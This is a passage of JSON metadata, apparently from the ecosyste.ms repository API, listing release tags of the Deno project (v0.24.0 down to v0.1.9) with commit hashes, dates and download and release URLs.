e.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.